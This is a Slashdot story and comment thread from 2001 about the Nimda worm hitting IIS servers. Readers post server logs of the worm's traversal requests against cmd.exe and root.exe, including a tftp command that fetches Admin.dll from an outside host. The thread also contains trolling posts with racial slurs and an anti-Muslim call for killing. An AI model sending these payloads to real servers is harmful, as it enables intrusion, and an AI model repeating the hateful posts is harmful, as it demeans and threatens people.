
New (More) Annoying Microsoft Worm Hits Net

CmdrTaco posted more than 12 years ago | from the what-a-pain-in-the-arse dept.


A new worm seems to be running rampant. Unlike Code Red, it attempts to hit boxes with many different exploits (including what looks like an attempt to exploit boxes still rooted by Code Red). It looks like each IP tries 16 attempts on its neighbors. There is also a new mail worm mailing WAV files or something with bits of what appears to be the registry... it may or may not be related. Got any words on this? Shut down those Windows boxes and stop opening attachments. And make that 21. Got another one while writing this story. All my hits are coming from 208.n.n.n (where I am). I'm sure it'll keep moving to nearby boxes. Update: 09/18 16:40 GMT by J: It now has a name: "Nimda." More info here, here, and here.

Here are examples of the requests it's sending:

GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

While writing this story I was hit a total of 4 times, 16 GET attempts per attack. In only 4 minutes. Also of interest, My desktop has now been hit about 500 times today, all from 208.x.x.x IPs. This might be really bad. I still haven't read anything about this anywhere else, so you heard it here first ;)

Update Web servers compromised by this worm apparently attach a "readme.eml" to all web pages served... and due to a bug in IE5, it will automatically execute the file! Yay Internet Explorer!


1163 comments

fwxpp (-1, Offtopic)

Turd Fergus0n (521940) | more than 12 years ago | (#2314665)

first windows xp post!

Oh no! XP has raw sockets!!! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2314728)

The sky is falling! The sky is falling!

This overreaction brought to you by Gibson Research Corporation [grc.com].

Re:Oh no! XP has raw sockets!!! (-1, Troll)

Anonymous Coward | more than 12 years ago | (#2314754)

Here, have some goatsex [goatse.cx] to go along with those raw sockets.

fp (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2314667)

fp

I would (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2314668)

I would forward this to the Help Desk people here, but then they'd know I was reading /.

Is this just the old Unicode exploit? (4, Interesting)

MeowMeow Jones (233640) | more than 12 years ago | (#2314670)

Or is it something new?

Looks like an exploit that's been around for a while (way before CR)

Bleah...my firewall logs all of this... (4, Informative)

Dimensio (311070) | more than 12 years ago | (#2314671)

And it suddenly had to back up once a week after Code Red started thwacking my machine. Perhaps I should write a script to exploit the root-hack and shut down the affected machines so that the local cable circuit won't be clogged with that crap. I can't imagine how bad this will get.

It's not like @Home (in my area) is doing *anything* to stop this. I really think that they should be policing for such disruptive activities and informing their customers when unsecured machines on their network are compromised.

Re:Bleah...my firewall logs all of this... (2, Interesting)

Anonymous Coward | more than 12 years ago | (#2314798)

Be glad they are sitting on their hands. In my area, their way of dealing with Code Red was to disable ALL port 80 requests -- which is really a dumb way to handle it.

Mail servers down (1)

Vamphyri (26309) | more than 12 years ago | (#2314672)

My mail server is down already. Thanks for this new virus in the wake of such a tragedy.

Re:Mail servers down (3, Offtopic)

Swordfish (86310) | more than 12 years ago | (#2314773)

It seems to me that it started at approximately 08:42 on Tuesday morning. I wonder what this means?!! I suspect this is not a coincidence.

It has a very high probability of /16 hits as well as /8 hits.

It's using about 50% of my modem bandwidth with about 20 IP addresses with port 80 active. It's so bad, I closed down most of my ports 80.

uh...just patch (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2314673)

No need to run terrified through the streets like CmdrTaco yelling "Shut down your Windows boxes! I just pissed my pants!" Just patch your damn systems. If only Linux were popular enough to inspire more worms...

Is there a patch out yet? (2)

Svartalf (2997) | more than 12 years ago | (#2314740)

If they're using all-new exploits, it may be that there ISN'T a patch to apply. Furthermore, getting Windows users to apply patches is spotty at best- users often don't even realize that they're running a web server on their box.

408 worm too? (5, Informative)

libertynews (304820) | more than 12 years ago | (#2314675)

I'm seeing massive numbers of timed out requests on my systems this morning. It started at exactly 9:06 eastern time.

I checked one of the IPs and it said 'Fuck USA Government, Fuck PoisonBOx' and opened a second window with what looked like a MIME buffer overflow attempt. I run Opera on Linux so it didn't affect me. It looks like we may be getting hit in a shotgun approach. My systems are in the 207.227 range and 208.

Brian

Re:408 worm too? (2)

Tim Doran (910) | more than 12 years ago | (#2314741)

Wow - I opened one of the IP's that's hit my box and saw the same thing - 'Fuck USA Government, Fuck PoisonBox'. I'm in the 24.156 range (Rogers@Home in Ontario...)

Wrong name (4, Informative)

platinum (20276) | more than 12 years ago | (#2314676)

The 208.x.x.x is similar to Code Red in that it attempts to scan local subnets (I bet you have a 208.x.x.x IP); therefore, naming it 208 is only good for those in your Class A. We have received attempts from over 100 hosts infected with the Code Red 2 worm, starting from the local class C, then class B, and now class A and others. It appears to be attempting to find rooter servers, for what purpose I can only imagine.

Re:Wrong name (5, Funny)

garcia (6573) | more than 12 years ago | (#2314748)

it originally started in just the 63.174 for me. Now it is hitting me from all over the place. It is really nasty b/c of the number of requests that each machine sends out.

I was surfing some porn sites this morning and they seemed horribly affected (none of the images would load and they were slow as hell).

ugh. Just when you thought it was safe to disable "assholes_log".

Re:Wrong name (-1, Troll)

zpengo (99887) | more than 12 years ago | (#2314840)

I was surfing some porn sites this morning and they seemed horribly affected... '

"Horribly affected"? Sounds like Stileproject!

Re:Wrong name (5, Informative)

platinum (20276) | more than 12 years ago | (#2314749)

<replying to myself>
If you try to access a vulnerable server it attempts to send you a 'readme.eml' file with a .wav content type. This file (using strings) appears to contain numerous registry entries plus all the strings used to find and infect other servers.

Re:Wrong name (2)

zpengo (99887) | more than 12 years ago | (#2314859)

It appears to be attempting to find rooter servers, for what purpose I can only imagine.

Propagation of the species?

It's interesting how worms, viruses, etc., take after biological tendencies, and almost have to be treated the same way to get rid of them: Quarantine, vaccination, precautionary measures, etc.

It's a shame there are no drugs for this one yet.

here's more output (4, Informative)

TheGratefulNet (143330) | more than 12 years ago | (#2314680)

www.iitelecom.qc.ca - - [18/Sep/2001:08:10:05 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281

www.iitelecom.qc.ca - - [18/Sep/2001:08:10:05 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291

www.iitelecom.qc.ca - - [18/Sep/2001:08:10:06 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305

www.iitelecom.qc.ca - - [18/Sep/2001:08:10:06 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322

www.iitelecom.qc.ca - - [18/Sep/2001:08:10:07 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322

www.iitelecom.qc.ca - - [18/Sep/2001:08:10:07 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.

Re:here's more output (4, Informative)

cphipps (103142) | more than 12 years ago | (#2314837)

...including what looks like an attempt to exploit boxes still rooted by Code Red

Assuming that refers to this:

"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"

then that's an exploit for Code Red II [f-secure.com] infected machines, not the original Code Red.

what part of the registry is mailed? (1)

flok (24996) | more than 12 years ago | (#2314681)

I wonder what part of the registry is mailed. Passwords+usernames of outlook? Or are all of these in pwl-files these days?

gpl (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2314687)

the gpl sucks, it lets people steal your code and say they made it

yup! (2)

macpeep (36699) | more than 12 years ago | (#2314688)

Yeah.. While I'm on Win2K and running a web server, it would never occur to me to run IIS. My logs are totally filled up with traces of this new worm. The logs also include lines such as this (IP censored).

GET /scripts/root.exe?/c+tftp%20-i%20212.163.x.x%20GET%20Admin.dll%20Admin.dll 212.163.x.x

Interesting..

On the upside, I haven't had a single hit by Code Red in the past hour or so! Let's hope this one is nasty enough to get the people to finally shut down / fix their boxes!

Re:yup! (1)

Dimensio (311070) | more than 12 years ago | (#2314706)

Are you running a webserver that is getting these requests, or is it just a firewall that logs the entire packet content?

I'm using IPChains under Linux and I don't get much packet information (perhaps I could set up a more verbose logging, I'm a bit inexperienced and my first priority was shutting out all unwanted traffic) other than the originating IP, the outgoing port and the attempted incoming port when the packet was dropped.

Re:yup! (1)

xanadu-xtroot.com (450073) | more than 12 years ago | (#2314786)

I don't know about you or him, but:

I turned Apache on at home (disabling everything but the ability to serve index.html). I see a ton of Code-Red hits all the time. Can iptables do this? I'm not totally sure. I see port 80 hits every time a Code-Red comes in (I allow the packets, but I them still).
Just a thought...

Re:yup! (1)

Dog and Pony (521538) | more than 12 years ago | (#2314776)

Exactly. :) I'm on W2k partly, also, and I wouldn't either. Sorry for the me-too post, but just because you are sorry enough to run windows (like me), there is no reason to be stupid on top of that... like running IIS. :)

What's the problem? (5, Funny)

niekze (96793) | more than 12 years ago | (#2314689)

Why won't someone port these to Linux? Microsoft operating systems seem to have a monopoly in this field. For now, if you read this in a *nix, just portscan your netmask and a few others and try a few old wu-ftp exploits.

"You have new mail, you open it. Your server begins port scanning every box on the internet. Do the servers mind? Of course not, they have nothing better to do." - New Microsoft Ad?

Re:What's the problem? (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2314845)

Yet another argument in favor of open source...

If the code was open, we'd be able to enjoy the same viruses that Windows users get!

Damn proprietary viruses! Damn them all to hell!

Re:What's the problem? (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2314850)

Well, try with Wine

SCNR

küsschen

early post (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2314691)

this early post is for the eradication and ethnic cleansing of sand niggers everywhere

Non-windows Servers (2)

under_score (65824) | more than 12 years ago | (#2314693)

This kinda stuff isn't nice for unix servers either. I have both FreeBSD with Apache and Linux with Tomcat doing stuff and every time a worm like this comes along, my stuff drags to a halt and occasionally crashes (if my app server is set up in a fragile way). At least I won't be perpetuating this one though.

Only now? (1)

cphipps (103142) | more than 12 years ago | (#2314694)

Turn off your windows servers

Well if you're still vulnerable to those exploits then you should've turned them off months ago...

The old Code Red Patches don't work? (1)

Uttles (324447) | more than 12 years ago | (#2314695)

So the patches MS sent out didn't stop this new one? I thought they said they had solved that type of problem... I just love MS.

Re:The old Code Red Patches don't work? (3, Insightful)

Dimensio (311070) | more than 12 years ago | (#2314737)

The new patches may well stop this one. No one implements the patches, which is why Code Red 2 packets are still flying all over every subnet on @Home.

Microsoft may be partly to blame, but it's not for being irresponsible in patching these issues; it's for allowing idiots who don't know how to properly administrate and who will never do security checks to easily run MS servers -- often without realising that the server exists.

Re:The old Code Red Patches don't work? (1)

Uttles (324447) | more than 12 years ago | (#2314757)

You're right about that, people don't administrate well.

As opposed to the Linux patches (0)

Anonymous Coward | more than 12 years ago | (#2314766)

Which fix all future bugs before they happen. Hello?

With 1,000 easy reasons to not use MS, you decide to MAKE ONE UP? Sheesh....

Turn them off??? (0)

Anonymous Coward | more than 12 years ago | (#2314696)

Right. Corporate won't mind. I'll just pull the plug.

Corporate ought to be securing the box better... (3)

Svartalf (2997) | more than 12 years ago | (#2314772)

If there's a patch, they should have applied it (If it breaks things, well, perhaps Windows isn't something they should be using...). If the patch doesn't fix this, they should be screaming at MS. If this is a new exploit maybe they should be screaming at MS and checking into a new system design...

This could explain why I can't reach my machine.. (1, Troll)

Gambit Thirty-Two (4665) | more than 12 years ago | (#2314698)

If it's scanning subnets, this could very well explain why I can't reach my machine at home (Roadrunner).

It's probably generating a sh*tload of traffic.

Can anyone on 24.x.x.x verify?

Re:This could explain why I can't reach my machine (1)

nitemayr (309702) | more than 12 years ago | (#2314755)

Yeah, just started on 24 /8 this morning at exactly 9:30am est

Re:This could explain why I can't reach my machine (1)

xZAQx (472674) | more than 12 years ago | (#2314784)

Hey I'm on 24.154 and I didn't notice any latency when SSHing in to home. (Coming from a 208 at work, btw)

Re:This could explain why I can't reach my machine (1)

headonfire (160408) | more than 12 years ago | (#2314787)

I'm on a cable network, 24.x.x.x...
My logs are getting swamped, with as many as 55 hits from a single IP in minutes.

File does not exist: /usr/local/httpd/htdocs/scripts/..Á{../winnt/system32/cmd.exe

File does not exist: /usr/local/httpd/htdocs/MSADC/root.exe

File does not exist: /usr/local/httpd/htdocs/msadc/..%5c../..%5c../..%5c/..Á{../..Á{../..Á{../winnt/system32/cmd.exe

running a search script on "cmd.exe" in my apache error.log tells me:

ip is 24.124.x attempts is '22'
ip is 24.124.x attempts is '11'
ip is 24.252.x attempts is '11'
ip is 24.69.x attempts is '11'
ip is 24.232.x attempts is '11'
ip is 24.124.x attempts is '11'
ip is 24.124.x attempts is '9'
ip is 24.162.x attempts is '9'
ip is 24.124.x attempts is '15'
ip is 24.93.x attempts is '11'
ip is 24.124.x attempts is '36'
ip is 216.198.x attempts is '1'
ip is 24.124.x attempts is '44'
ip is 24.124.x attempts is '1'
ip is 24.16.x attempts is '1'
ip is 24.124.x attempts is '2'
ip is 24.37.x attempts is '2'
ip is 24.164.x attempts is '5'
ip is 24.0.x attempts is '11'
ip is 24.124.x attempts is '11'
ip is 24.1.x attempts is '22'
ip is 24.124.x attempts is '22'
ip is 24.161.x attempts is '11'
ip is 24.6.x attempts is '11'
ip is 24.124.x attempts is '55'
ip is 24.124.x attempts is '22'
ip is 24.124.x attempts is '22'
ip is 24.124.x attempts is '33'

This is just from this morning, starting in the wee hours and still continuing as I write.

My snort box is picking up something too... (1)

jermz (6352) | more than 12 years ago | (#2314699)

Snort has been going nuts this morning. I am getting about the same results. Although, in my case, the attacks are coming from 63.x.x.x, which is the same /8 as I am on.

From here, it looks like a variation on Code Red. Should be an interesting morning.

Jeremy

This isn't a worm... (0)

Anonymous Coward | more than 12 years ago | (#2314700)

This is just some script kiddie trying to exploit the holes that Code Red previously opened up. Unless you see it coming from different IP subnets, the likelihood of this attack being a worm is nearly zero.

AC

Re:This isn't a worm... (1)

ergo98 (9391) | more than 12 years ago | (#2314793)

When it finds a hole in a machine it replicates itself to said machine and launches more attacks from the new victim, hence it's a worm.

yeah it sucks (2)

Dr. Awktagon (233360) | more than 12 years ago | (#2314705)

I noticed that this morning on my various IDS's and was going to post on OT message in another story to see if it was affecting many people.

I get them from inside the local net.

I can't believe this stupid Code Red crap is still going on. I've gotten used to the constant hits. And now am I going to have to get used to this junk?? Argh! I'm just firewalling them off as they hit.

What's this one trying to exploit? (1)

batkiwi (137781) | more than 12 years ago | (#2314710)

Looking at the code red virus it was obvious it was going for a hole in the indexing server.

What's this one going after?
Just IIS web server itself?

It'd be almost amusing if this was just some script kiddie with a bunch of zombies trying to cause a virus "scare" (ie hitting a bunch of boxes with a peculiar looking URL, making everyone think it's a worm).

I'm not saying it's not a virus, just it would be amusing...

Yep - I'm being hit too. (2)

Tim Doran (910) | more than 12 years ago | (#2314711)

1300 hits so far. Each infected machine seems to be making a LOT of attempts.

Here we go again...

Outlook Express 6.0 can prevent spread (5, Informative)

savaget (26702) | more than 12 years ago | (#2314713)

With the new Outlook Express 6.0, you can now prevent the user from opening any attachments.

Here is how it is done:

Tools>Options>Security>check "Do not allow attachments to be saved or opened that could potentially be a virus"

Re:Outlook Express 6.0 can prevent spread (4, Interesting)

Dog and Pony (521538) | more than 12 years ago | (#2314802)

Yeah. If you turn that on, it will warn you that .txt files or .gif files are potentially viral, while letting through .doc and other formats that are "known" (lmao) to be safe - or rather, MS formats.

Actually, it is such a stupid check, it almost makes things worse instead.

DoS.Storm Worm (1)

jazon (4995) | more than 12 years ago | (#2314715)

The attacks look a lot like the DoS.Storm worm that appeared on the scene June 2001. Either it's a new outbreak of DoS.Storm, or a modified version

Symantec has info on DoS.Storm here [symantec.com]
SANS incidents.org has more details here [incidents.org]

seeing this as well (1)

Emrys (7536) | more than 12 years ago | (#2314719)

All of the hits I'm getting are coming from 64.x.x.x machines. Most are coming from 64.90.x.x. My own subnet falls within 64.90.x.x, so maybe the worm attacks near machines first. Of course, /. is also inside 64.x.x.x...

Re:seeing this as well (1)

marnanel (98063) | more than 12 years ago | (#2314818)

Yes, similarly here. I've heard it suggested that this is some form of the Code Blue [datafellows.com] worm: according to Datafellows's website, CB attacks random IPs half the time, and IPs in the same /16 the other half.

Destroy Islam. Exterminate All Muslims. Destroy. (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2314720)

Our tormented dead scream out for vengeance:
  1. Kill all Muslims.
  2. Kill all Mohammedans.
  3. Kill all Arabs.
  4. Kill all Towel Heads.
  5. Kill ll Camel Jockeys.
  6. Kill all Dune Coons.
  7. Kill all Sand Niggers.
  8. Kill all Islam.
  9. Nuke their countries to hell.
  10. Nuke them again.
  11. Death to Islam.

I piss on Mecca. I wipe my ass with the Koran. I spit upon Mohammed.

Re:Destroy Islam. Exterminate All Muslims. Destroy (0, Offtopic)

HermanBupkis (442793) | more than 12 years ago | (#2314827)

Don't be a dink, man.

We are all upset about what the Terrorists did. But you don't have to be a wiener to a bunch of innocent people.

Me to... (2)

JeffL (5070) | more than 12 years ago | (#2314724)

[checks logs]

I am seeing these hits too. Since 18/Sep/2001:07:27:25 -0600 (it is now 09:16) I have been hit by 120 different machines. 105 of them are on my class B, 128.138, 14 more just start with 128, and only one is from a totally different address.

Perhaps I should contact the admins at my site who are in charge of the offending machines.

Worm roll-up? (2, Interesting)

dave-fu (86011) | more than 12 years ago | (#2314725)

I see it looking for the exploit Code Red used, trying out MSADC and a directory traversal exploit.
My money's on the Code Red worm being retrofit yet again to try and execute a few more tired old exploits. Which is to say hopefully Hotmail and Windows Update won't get rooted again.
Haven't heard anything about it on Bugtraq yet; haven't checked Incidents (securityfocus.com isn't chugging along so speedily).
It'll be interesting to see how many boxes this roots out in the light of increased press coverage of Code Red and MS's spate of security-minded tools out there. Or: how good do people feel about that leaky dam now that they've stuck their thumb in the hole labelled "Code Red"?

Been hit many many times already (2, Informative)

strags (209606) | more than 12 years ago | (#2314729)

Wow - I've got about 1000 similar hits in my logs, starting from around 6.30am this morning. From a variety of different IP addresses.

63.73.31.242 just hit me 16 times.

Going to http://63.73.31.242 indicates:
"National Aerospace Documentation Home Page"
and attempts to launch a "readme.exe" executable immediately.

Just checked another site: 63.168.150.72 - plain old IIS page, but attempts to launch the same executable.

So, we have Code Red, with an added attempt to launch a (no doubt) malicious executable from infected pages.

Re:Been hit many many times already (1)

Dimensio (311070) | more than 12 years ago | (#2314800)

I checked those links from a computer running IE6 (I'm at work).

IE reported that I had clicked a multimedia link after loading the page (er...no) and asked if I wanted to run the media in IE (it didn't give me an option to just not run it at all). When I said no, it loaded Media Player which then informed me that the selected media was invalid.

Weird. They also both opened up the readme.eml pages in another window.

Too Slow (3, Informative)

xanadu-xtroot.com (450073) | more than 12 years ago | (#2314731)

Damn. I just got an e-mail from my ISP (corporate LAN/WAN) telling us of this. Here's their text:

~~~~~~~~~~~~~
Many ISPs, including [ISP], are under attack by a new worm that appears to be related to the recent CodeRed worm. This worm attacks Microsoft web servers via a known vulnerability and seeks to replicate itself by searching for other vulnerable servers.
The traffic caused by this worm has caused severe network problems worldwide this morning (18 Sep 2001) according to many ISP-related mailing lists. More information will be sent to this announcement list as it becomes available.
~~~~~~~~~~~~~

OK, so they say it's a Code-Redish bug. According to Taco's post, it's not even close (sort of).

I'm using *NIX/Apache.
I'm not gonna worry about this one (yet again...). Y'all with them damn Win boxes keeping the Internet flooded with this sort of junk, PLEASE either shut off your machines, or get a real OS...
(or at least, apply the damn patch already)

woah (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2314732)

All these weird entries in my server log are making me horny! I think i'll go give myself another blowjob.

Yep, we're seeing them here too. (5, Informative)

Olinator (412652) | more than 12 years ago | (#2314734)

David Korpiewski, our Windoze martyr, is hard at work on this one (I Don't Do Windows:-), and had this to say:

Evidence from compromised boxes elsewhere on campus seems to indicate that this bug will create a ton of *.eml files on the computer and they are all about 78k. We haven't received an .eml file in hand yet, to view the contents. A variety of .eml files are created, including "desktop.eml", "readme.eml", etc.

A compromised system will attach a readme.eml file to the bottom of all web pages served. This is because there is currently a bug [guninski.com] out for IE5 that will auto execute any given .eml file.

Re:Yep, we're seeing them here too. (1)

gwizah (236406) | more than 12 years ago | (#2314815)

Wait, An MS-bug that auto-executes a file??.

Where have we seen this before? Oh yeah! In practically every MS product. When is Microsoft going to learn to isolate .exe commands from Joe Q. Public?

Damn...just submitted this story... (3, Informative)

ergo98 (9391) | more than 12 years ago | (#2314743)

Anyways here's the sequence of attempts it makes, trying to capitalize on old worms that weren't cleaned up properly, as well as known unicode exploits.



2001-09-18 15:10:19 *.*.*.* GET /scripts/root.exe 404 701 72 0 - -

2001-09-18 15:10:19 *.*.*.* GET /MSADC/root.exe 404 701 70 0 - -

2001-09-18 15:10:19 *.*.*.* GET /c/winnt/system32/cmd.exe 404 701 80 0 - -

2001-09-18 15:10:19 *.*.*.* GET /d/winnt/system32/cmd.exe 404 701 80 0 - -

2001-09-18 15:10:19 *.*.*.* GET /scripts/..%5c../winnt/system32/cmd.exe 404 701 96 10 - -

2001-09-18 15:10:19 *.*.*.* GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 701 117 10 - -

2001-09-18 15:10:20 *.*.*.* GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 701 117 0 - -

2001-09-18 15:10:20 *.*.*.* GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe 404 701 145 0 - -

2001-09-18 15:10:20 *.*.*.* GET /scripts/..Á../winnt/system32/cmd.exe 404 701 97 0 - -

2001-09-18 15:10:20 *.*.*.* GET /scripts/winnt/system32/cmd.exe 404 701 97 10 - -

2001-09-18 15:10:20 *.*.*.* GET /scripts/../../winnt/system32/cmd.exe 404 701 97 0 - -

2001-09-18 15:10:20 *.*.*.* GET /scripts/..\../winnt/system32/cmd.exe 404 701 97 0 - -

2001-09-18 15:10:21 *.*.*.* GET /scripts/..%5c../winnt/system32/cmd.exe 404 701 98 0 - -

2001-09-18 15:10:21 *.*.*.* GET /scripts/..%5c../winnt/system32/cmd.exe 404 701 96 0 - -

2001-09-18 15:10:21 *.*.*.* GET /scripts/..%5c../winnt/system32/cmd.exe 404 701 100 0 - -

2001-09-18 15:10:21 *.*.*.* GET /scripts/..%2f../winnt/system32/cmd.exe 404 701 96 0 - -

Furthermore every attacking system was in the same 255.0.0.0/8 as the target system so it appears to target in the same "Class A" address (of course in this case it's 216.x.x.x so it's not really Class A, but you get the point).


More Info (5, Informative)

Nater (15229) | more than 12 years ago | (#2314744)

When the dir command succeeds (or rather, when the worm believes it has succeeded), the next request has a tftp command embedded in it which attempts to install a file called Admin.dll. Following that, there is a request for the dll itself, which presumably kick starts the worm.

I'll take a look at Admin.dll later today.

Sue them (1)

slimme (84675) | more than 12 years ago | (#2314747)

If those boxes cause you a problem (lost time, lost work, lost bandwidth, distress, ...) you have every right to sue the operators of these (unattended?) boxes.

You might also ask their ISPs to shut down their internet connection for these reasons. If they don't comply, sue them.

You do live in the U.S.A., don't you?

exactly 1 week after WTC attack (9 AM EST) (1)

Orp (6583) | more than 12 years ago | (#2314759)

Is it just a coincidence? I doubt it.

I noticed the activity light on my cable modem (charter communications @home) was on constantly - ran tcpdump and it's all these "who has x? tell y" arp queries (nameserver lookups), just like with code red.

Leigh Orf

I've been getting hits since last night... (1)

kypper (446750) | more than 12 years ago | (#2314762)

my firewall ain't pleased.

I didn't think of Code Red stuff since my mind's been on the WTC stuff and potential war.

Isn't it interesting that everything nasty happens in just a short period? At least I know why my net has been crawling so badly.

slashdot community (1)

mach-5 (73873) | more than 12 years ago | (#2314769)

It is really cool to see everyone giving their experiences and trying to pull together to figure this one out. It won't be long until a slashdotter gets to the bottom of this one.

Re:slashdot community (2)

Rackemup (160230) | more than 12 years ago | (#2314826)

It is pretty cool eh? So many geeks to chip in with knowledge and experience...

I wonder if our servers are being scanned...

Mail sent to me. (1)

tino_sup (460223) | more than 12 years ago | (#2314770)

I received mail with a readme.exe and txt.exe attachments.

The sending address was from jleo@arcgny.org with the subject line:

ware\Microsoft\WindoJb4 "supertrak66bclass11_28hlaconsoleapplication2data consoleapplication1consoleapplication1supertrak66b servicesuntitled - 1ultrabudgetciscostuffconsoleapplication2pitou-0co nsoleapplication2_debug

Searching for the address brought up the 2600 website with a Support Message for the WTC.

A quick traceroute returned:
16 172 ms 187 ms 125 ms adsl-65-66-34-57.dsl.stlsmo.swbell.net [65.66.34.57]

A little more info found returned:

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID:

I have yet to scope the file.

Bin Laden again (0)

Anonymous Coward | more than 12 years ago | (#2314779)

Guess he has it in for the U S of A =)

Code Blue like? (1)

Erasei (315737) | more than 12 years ago | (#2314782)

Symantec has an article [symantec.com] on Code Blue. This might not be it.. but it's a lot like it from what I can tell.

Spread analysis (1)

Ex Machina (10710) | more than 12 years ago | (#2314788)

first hit: 5:25:07 GMT

grep winnt /var/log/apache/error.log | cut -d " " -f 8 | cut -d ] -f 1 | uniq | wc -l
27 hosts

All the hits are from my class A
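The probe sequences quoted in the story and in several comments above (the %255c, %%35%63 and %c1%1c traversal forms, the root.exe and /c/ leftovers, and the tftp fetch of Admin.dll), together with the per-IP counting that headonfire's "search script" and the grep pipeline just above do by hand, come down to one detection job: work out what a vulnerable IIS would have made of each request path, then count who is sending them. The following is an added example written for this page, not code posted by anyone in the thread. It models the net effect of the two IIS decoding bugs the worm leans on (decoding the path a second time after the security check, MS01-026, and accepting malformed two-byte UTF-8 such as %c1%1c, MS00-078), classifies each request and tallies attempts per source. The log lines and addresses are constructed; the names iis_decode, strict_decode, escapes_webroot, classify and analyze are mine.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes, unquote_plus

# Constructed sample in Apache common log format, modelled on the probe
# strings quoted in this thread. The addresses are made up (RFC 1918).
SAMPLE_LOG = """\
10.0.0.5 - - [18/Sep/2001:08:10:05 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281
10.0.0.5 - - [18/Sep/2001:08:10:06 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
10.0.0.5 - - [18/Sep/2001:08:10:07 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322
10.0.0.9 - - [18/Sep/2001:08:11:01 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
10.0.0.9 - - [18/Sep/2001:08:11:02 -0700] "GET /scripts/root.exe?/c+tftp%20-i%2010.0.0.9%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 0
10.0.0.7 - - [18/Sep/2001:08:12:00 -0700] "GET /index.html HTTP/1.0" 200 1043
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)')


def iis_decode(path):
    """Model of what the unpatched IIS canonicaliser made of a URL path:
    percent-decode twice (the 'superfluous decode' bug, MS01-026) and accept
    malformed two-byte UTF-8 such as %c1%1c or %c0%af (MS00-078).
    This reproduces the net effect only; it is not IIS code."""
    twice = unquote_to_bytes(unquote_to_bytes(path))
    out = bytearray()
    i = 0
    while i < len(twice):
        b = twice[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(twice):
            # lenient two-byte form: 5 low bits of the lead byte, 6 low bits
            # of the trail byte, with no check that the trail is 10xxxxxx
            out.append(((b & 0x1F) << 6) | (twice[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return out.decode('latin-1')


def strict_decode(path):
    """The safe counterpart: decode exactly once and insist on valid UTF-8,
    so %255c stays the literal text '%5c' and %c1%1c raises."""
    return unquote_to_bytes(path).decode('utf-8')


def escapes_webroot(decoded_path):
    """True if '..' segments climb above the directory the path started in.
    Both slash styles count, since Windows accepts either."""
    depth = 0
    for seg in decoded_path.replace('\\', '/').split('/'):
        if seg == '..':
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != '.':
            depth += 1
    return False


def classify(target):
    """Label one request target; None means ordinary traffic."""
    path, _, query = target.partition('?')
    decoded = iis_decode(path)
    basename = decoded.replace('\\', '/').rsplit('/', 1)[-1].lower()
    if basename not in ('cmd.exe', 'root.exe'):
        return None
    command = unquote_plus(query).lower()   # e.g. '/c dir'
    if 'tftp' in command:
        return 'payload-fetch'      # pulling Admin.dll from the attacker
    if escapes_webroot(decoded):
        return 'traversal-probe'    # Unicode / double-decode traversal
    return 'backdoor-probe'         # root.exe, /c/, /d/: Code Red II leftovers


def analyze(log_text):
    """Count worm-style requests per source IP and per probe kind."""
    per_ip, kinds = Counter(), Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        kind = classify(m['target'])
        if kind:
            per_ip[m['ip']] += 1
            kinds[kind] += 1
    return per_ip, kinds


if __name__ == '__main__':
    per_ip, kinds = analyze(SAMPLE_LOG)
    for ip, n in per_ip.most_common():
        print(f"ip is {ip} attempts is '{n}'")
    print(dict(kinds), f"{len(per_ip)} hosts")
```

strict_decode sits beside iis_decode to show the fix rather than just the bug: a single decode that insists on valid UTF-8 turns ..%255c.. into the harmless literal ..%5c.. and rejects %c1%1c outright, so the same escapes_webroot check that flags the worm's request under the vulnerable decoder finds nothing under the safe one. Decode fully, once, then check; never check and then decode again.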

hrmmmm..... (0)

Anonymous Coward | more than 12 years ago | (#2314791)

looks like I got a few this morning. all from 65.102.x.x

scanning (1)

defy (159002) | more than 12 years ago | (#2314792)

Do all these boxes doing the scanning seem to be patched from the exploit themselves?

Dumping Files (1)

jducoeur (134305) | more than 12 years ago | (#2314796)

